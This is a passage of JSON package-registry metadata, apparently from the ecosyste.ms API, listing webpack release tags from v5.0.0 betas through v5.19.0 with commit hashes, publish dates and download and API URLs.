","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.